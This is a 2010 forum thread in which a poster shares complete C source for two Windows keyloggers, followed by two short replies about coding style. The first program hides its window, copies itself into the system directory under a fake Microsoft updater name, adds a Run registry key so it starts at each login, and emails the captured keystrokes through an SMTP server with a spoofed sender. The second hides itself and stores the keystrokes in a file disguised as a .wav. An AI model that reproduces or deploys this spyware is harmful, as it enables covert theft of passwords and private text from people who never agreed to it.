LinkBack URL
About LinkBacks
This is my keylogger. I have made two versions. The first one records and sends the logs through a specified SMTP server with a custom email. The second one records and stores the file on the computer itself, so you will need physical access to retrieve the logs.
StandaloneCode:#include <windows.h> #include <stdio.h> #include <winuser.h> #include <windowsx.h> #include <time.h> //-lws2_32 int MailIt (char *mailserver, char *emailto, char *emailfrom, char *emailsubject, char *emailmessage); #define BUFSIZE 800 #define waittime 10000 #define cmailserver "smtp.live.com" #define cemailto "www.randumadress@hotmail.com" #define cemailfrom "file@fbi.gov" #define LogLength 505 #define FileName "sound.wav" #define SMTPLog "ring.wav" #define cemailsubject "INFO" int get_keys(void); int test_key(void); int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil) { HKEY hKey; char system[MAX_PATH]; char pathtofile[MAX_PATH]; char sys[MAX_PATH] = "\\MicrosoftUpdate32.exe"; HMODULE GetModH = GetModuleHandle(NULL); GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); GetSystemDirectory(system,sizeof(system)); strcat(system,sys); CopyFile(pathtofile,system,false); HWND stealth; AllocConsole(); stealth=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, "Microsoft Updater",0,REG_SZ,(const unsigned char*)system,sizeof(system)); RegCloseKey(hKey); { FILE *file; file=fopen(FileName,"a+"); time_t theTime=time(0); fputs("\nStarted logging: ", file); fputs(ctime(&theTime),file); fclose(file); } int t = get_keys(); return t; } int get_keys() { int freadindex; char *buf; long len; FILE *file; file=fopen(FileName,"a+"); int i = 0; long character; while(i < 500) { Sleep(10);/*to prevent cpu freeze*/ for(character=8;character<=222;character++) { if(GetAsyncKeyState(character)==-32767) { FILE *file; file=fopen(FileName,"a+"); if(file==NULL) { return 1; } if(file!=NULL) { //takes care of the letters and numbers if((character>=39)&&(character<=64)) { fputc(character,file); fclose(file); break; } else if((character>64)&&(character<91)) { character+=32; fputc(character,file); fclose(file); break; } else { //this sorts out the symbols and character switch(character) { case VK_LSHIFT: fputs("[SHIFT]\n",file); fclose(file); case VK_DECIMAL: //decimal fputc('.',file); fclose(file); case VK_SPACE: //space fputc(' ',file); fclose(file); case VK_SHIFT: fputs("[SHIFT]\n",file); fclose(file); case VK_RETURN: fputs("[ENTER]\n",file); fclose(file); case VK_BACK: fputs("[BACKSPACE]\n",file); fclose(file); case VK_OEM_1: fputs("[; or :]\n",file); fclose(file); case VK_OEM_2: fputs("[/ or ?]\n",file); fclose(file); case VK_OEM_3: fputs("[` or ~]\n",file); fclose(file); case VK_OEM_4: fputs("[ [ or { ]\n",file); fclose(file); case VK_OEM_5: fputs("[\\ or |]\n",file); fclose(file); case VK_OEM_6: fputs("[ ] or } ]\n",file); fclose(file); case VK_OEM_7: fputs("['\"]\n",file); fclose(file); case VK_CAPITAL: fputs("[CAPS LOCK]\n",file); fclose(file); default: //if the symbol is not recognized fputs("[Unknown]\n",file); //put unknown symbol fclose(file); } } } } i++; } FILE *file; file=fopen(FileName,"rb"); fseek(file,0,SEEK_END); //go to end len=ftell(file); //get position at end (length) if(len>=LogLength) { fseek(file,0,SEEK_SET);//go to beg. buf=(char *)malloc(len);//malloc buffer freadindex=fread(buf,1,len,file);//read into buffer buf[freadindex] = '\0';//Extra bit I have to add to make it a sting MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf); fclose(file); file=fopen(FileName,"w"); } fclose(file); //free (buf); } return EXIT_SUCCESS; } int MailIt (char *mailserver, char *emailto, char *emailfrom, char *emailsubject, char *emailmessage) { SOCKET sockfd; WSADATA wsaData; FILE *smtpfile; #define bufsize 300 int bytes_sent; /* Sock FD */ int err; struct hostent *host; /* info from gethostbyname */ struct sockaddr_in dest_addr; /* Host Address */ char line[1000]; char *Rec_Buf = (char*) malloc(bufsize+1); smtpfile=fopen(SMTPLog,"a+"); if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) { fputs("WSAStartup failed",smtpfile); WSACleanup(); return -1; } if ( (host=gethostbyname(mailserver)) == NULL) { perror("gethostbyname"); exit(1); } memset(&dest_addr,0,sizeof(dest_addr)); memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length); /* Prepare dest_addr */ dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */ dest_addr.sin_port= htons(25); /* PORT defined above */ /* Get socket */ if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) { perror("socket"); exit(1); } /* Connect !*/ fputs("Connecting....\n",smtpfile); if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){ perror("connect"); exit(1); } Sleep(waittime); err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0'; fputs(Rec_Buf,smtpfile); strcpy(line,"helo me.somepalace.com\n"); fputs(line,smtpfile); bytes_sent=send(sockfd,line,strlen(line),0); Sleep(waittime); err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0'; fputs(Rec_Buf,smtpfile); strcpy(line,"MAIL FROM:<"); strncat(line,emailfrom,strlen(emailfrom)); strncat(line,">\n",3); fputs(line,smtpfile); bytes_sent=send(sockfd,line,strlen(line),0); Sleep(waittime); err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0'; fputs(Rec_Buf,smtpfile); strcpy(line,"RCPT TO:<"); strncat(line,emailto,strlen(emailto)); strncat(line,">\n",3); fputs(line,smtpfile); bytes_sent=send(sockfd,line,strlen(line),0); Sleep(waittime); err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0'; fputs(Rec_Buf,smtpfile); strcpy(line,"DATA\n"); fputs(line,smtpfile); bytes_sent=send(sockfd,line,strlen(line),0); Sleep(waittime); err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0'; fputs(Rec_Buf,smtpfile); Sleep(waittime); strcpy(line,"To:"); strcat(line,emailto); strcat(line,"\n"); strcat(line,"From:"); strcat(line,emailfrom); strcat(line,"\n"); strcat(line,"Subject:"); strcat(line,emailsubject); strcat(line,"\n"); strcat(line,emailmessage); strcat(line,"\r\n.\r\n"); fputs(line,smtpfile); bytes_sent=send(sockfd,line,strlen(line),0); Sleep(waittime); err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0'; fputs(Rec_Buf,smtpfile); strcpy(line,"quit\n"); fputs(line,smtpfile); bytes_sent=send(sockfd,line,strlen(line),0); Sleep(waittime); err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0'; fputs(Rec_Buf,smtpfile); fclose(smtpfile); #ifdef WIN32 closesocket(sockfd); WSACleanup(); #else close(sockfd); #endif }
Code://-lws2_32 #include <windows.h> #include <stdio.h> #include <winuser.h> #include <windowsx.h> #include <time.h> #define BUFSIZE 800 #define waittime 500 #define LogLength 100 #define FileName "sound.wav" int get_keys(void); int test_key(void); int main(void) { //Uncomment the lines below to put the keylogger in stealh mode. HWND stealth; /*creating stealth */ AllocConsole(); stealth=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); {FILE *file; file=fopen(FileName,"a+"); time_t theTime=time(0); fputs("\nStarted logging: ", file); fputs(ctime(&theTime),file); fclose(file); } int t = get_keys(); return t; } int get_keys() { int freadindex; char *buf; long len; FILE *file; file=fopen(FileName,"a+"); short character; while(1) { Sleep(5);/*to prevent 100% cpu usage*/ for(character=8;character<=222;character++) { if(GetAsyncKeyState(character)==-32767) { FILE *file; file=fopen(FileName,"a+"); if(file==NULL) { return 1; } if(file!=NULL) { if((character>=39)&&(character<=64)) { fputc(character,file); fclose(file); break; } else if((character>64)&&(character<91)) { character+=32; fputc(character,file); fclose(file); break; } else { switch(character) { case VK_SPACE: fputc(' ',file); fclose(file); break; case VK_SHIFT: fputs("\r\n[SHIFT]\r\n",file); fclose(file); break; case VK_RETURN: fputs("\r\n[ENTER]\r\n",file); fclose(file); break; case VK_BACK: fputs("\r\n[BACKSPACE]\r\n",file); fclose(file); break; case VK_TAB: fputs("\r\n[TAB]\r\n",file); fclose(file); break; case VK_CONTROL: fputs("\r\n[CTRL]\r\n",file); fclose(file); break; case VK_DELETE: fputs("\r\n[DEL]\r\n",file); fclose(file); break; case VK_OEM_1: fputs("\r\n[;:]\r\n",file); fclose(file); break; case VK_OEM_2: fputs("\r\n[/?]\r\n",file); fclose(file); break; case VK_OEM_3: fputs("\r\n[`~]\r\n",file); fclose(file); break; case VK_OEM_4: fputs("\r\n[ [{ ]\r\n",file); fclose(file); break; case VK_OEM_5: fputs("\r\n[\\|]\r\n",file); fclose(file); break; case VK_OEM_6: fputs("\r\n[ ]} ]\r\n",file); fclose(file); break; case VK_OEM_7: fputs("\r\n['\"]\r\n",file); fclose(file); break; case 187: fputc('+',file); fclose(file); break; case 188: fputc(',',file); fclose(file); break; case 189: fputc('-',file); fclose(file); break; case 190: fputc('.',file); fclose(file); break; case VK_NUMPAD0: fputc('0',file); fclose(file); break; case VK_NUMPAD1: fputc('1',file); fclose(file); break; case VK_NUMPAD2: fputc('2',file); fclose(file); break; case VK_NUMPAD3: fputc('3',file); fclose(file); break; case VK_NUMPAD4: fputc('4',file); fclose(file); break; case VK_NUMPAD5: fputc('5',file); fclose(file); break; case VK_NUMPAD6: fputc('6',file); fclose(file); break; case VK_NUMPAD7: fputc('7',file); fclose(file); break; case VK_NUMPAD8: fputc('8',file); fclose(file); break; case VK_NUMPAD9: fputc('9',file); fclose(file); break; case VK_CAPITAL: fputs("\r\n[CAPS LOCK]\r\n",file); fclose(file); break; default: fclose(file); break; } } } } } FILE *file; file=fopen(FileName,"rb"); fseek(file,0,SEEK_END); //go to end len=ftell(file); //get position at end (length) if(len>=LogLength) { fseek(file,0,SEEK_SET);//go to beg. buf=(char *)malloc(len);//malloc buffer freadindex=fread(buf,1,len,file);//read into buffer buf[freadindex] = '\0';//Extra bit I have to add to make it a sting fclose(file); file=fopen(FileName,"w"); } fclose(file); //free (buf); } return EXIT_SUCCESS; }
Results 1 to 3 of 3
Thread: [C++]Keylogger
- 01 Jul. 2010 04:58pm #1
[C++]Keylogger
- 01 Jul. 2010 05:37pm #2
This looks more like C than C++.
You should use Object Oriented design if you're going to use C++.
- 11 Jul. 2010 04:13am #3
Thanks. Criticism is always appreciated.
Reply With Quote
